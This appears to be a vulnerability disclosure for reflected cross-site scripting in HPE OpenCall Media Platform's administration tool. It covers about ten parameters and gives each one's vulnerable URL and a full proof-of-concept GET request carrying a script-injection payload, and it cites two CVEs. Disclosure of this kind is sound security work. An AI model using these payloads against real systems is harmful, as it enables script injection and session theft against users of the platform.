1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2“><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_TYPE3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_TYPE3 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32″><script>alert(1)< %2fscript>54a0f
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32“><script>alert(1)<%2fscript>54a0f HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_NAME0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME0 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802″><script>alert(1)< %2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802“><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_NAME1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME1 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e”><script>alert(1)< %2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e“><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_NAME2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME2 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f”><script>alert(1)< %2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f“><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_NAME3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NAME3 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8″><script>alert(1)< %2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8“><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – GetMapAction function
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a”><script>alert(1)< %2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a“><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_NUM parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_NUM input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d”><script>alert(1)< %2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d“><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – NAME parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter NAME input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0″><script>alert(1)< %2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0“><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function parameter next input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)< %2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function parameter sessionType input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=25ed6″><script>alert(1)< %2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/cdrdispatch?sessionType=25ed6“><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
CVE’s
- CVE-2017-5799 – Remote Code Execution
- CVE-2017-5798 – Reflected Cross-Site Scripting (XSS)